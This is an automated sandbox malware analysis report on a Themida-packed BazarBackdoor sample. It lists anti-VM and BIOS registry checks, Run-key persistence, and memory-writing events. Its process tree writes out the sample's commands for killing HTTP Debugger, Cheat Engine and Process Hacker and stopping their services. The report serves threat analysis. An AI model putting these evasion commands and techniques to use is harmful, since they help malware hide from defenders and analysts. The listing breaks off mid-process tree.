Malware Analysis Report

2025-01-02 12:04

Sample ID 220908-ww8wmafca2
Target lxJWhxw.exe
SHA256 c1de91c5094d5821b7493dd8db39b14a2c286b3b14215b5e90e97527d1864bd7
Tags
themida bazarbackdoor backdoor evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c1de91c5094d5821b7493dd8db39b14a2c286b3b14215b5e90e97527d1864bd7

Threat Level: Known bad

The file lxJWhxw.exe was found to be: Known bad.

Malicious Activity Summary

themida bazarbackdoor backdoor evasion persistence trojan

BazarBackdoor

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Bazar/Team9 Backdoor payload

Nirsoft

Downloads MZ/PE file

Stops running service(s)

Executes dropped EXE

Loads dropped DLL

Themida packer

Checks BIOS information in registry

Checks whether UAC is enabled

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: RenamesItself

Kills process with taskkill

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

NTFS ADS

Opens file in notepad (likely ransom note)

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-09-08 18:17

Signatures

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-09-08 18:17

Reported

2022-09-08 18:19

Platform

win10v2004-20220812-en

Max time kernel

93s

Max time network

97s

Command Line

"C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe"

Signatures

BazarBackdoor

backdoor bazarbackdoor

Bazar/Team9 Backdoor payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Downloads\update.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Downloads\update.exe N/A
N/A N/A N/A N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\update.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Downloads\update.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\certutil.exe N/A
N/A N/A C:\Users\Admin\Downloads\update.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Downloads\update.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\Downloads\update.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\0f8a992d-16af-451a-8a6d-ed79b25556ad.tmp C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220908201816.pma C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\system32\WerFault.exe

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 21839.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A

Suspicious behavior: RenamesItself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe N/A
N/A N/A C:\Users\Admin\Downloads\update.exe N/A
N/A N/A C:\Users\Admin\Downloads\update.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4476 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 3408 wrote to memory of 3648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3408 wrote to memory of 3648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 5000 wrote to memory of 5084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 5000 wrote to memory of 5084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 2664 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2664 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 4476 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2692 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4304 wrote to memory of 2104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4304 wrote to memory of 2104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 1152 wrote to memory of 3124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1152 wrote to memory of 3124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4504 wrote to memory of 4256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4504 wrote to memory of 4256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 2924 wrote to memory of 3920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2924 wrote to memory of 3920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 1556 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 4476 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 3856 wrote to memory of 4272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3856 wrote to memory of 4272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 2232 wrote to memory of 2092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2232 wrote to memory of 2092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 1984 wrote to memory of 3604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1984 wrote to memory of 3604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3952 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4336 wrote to memory of 5008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4336 wrote to memory of 5008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4476 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 1972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 1972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 4476 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe C:\Windows\system32\cmd.exe
PID 3524 wrote to memory of 4484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3524 wrote to memory of 4484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe

"C:\Users\Admin\AppData\Local\Temp\lxJWhxw.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerUI.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerSvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerUI.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerSvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1

C:\Windows\system32\sc.exe

sc stop HTTPDebuggerPro

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerUI.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1

C:\Windows\system32\taskkill.exe

taskkill /f /im HTTPDebuggerSvc.exe

C:\Windows\system32\cmd.exe

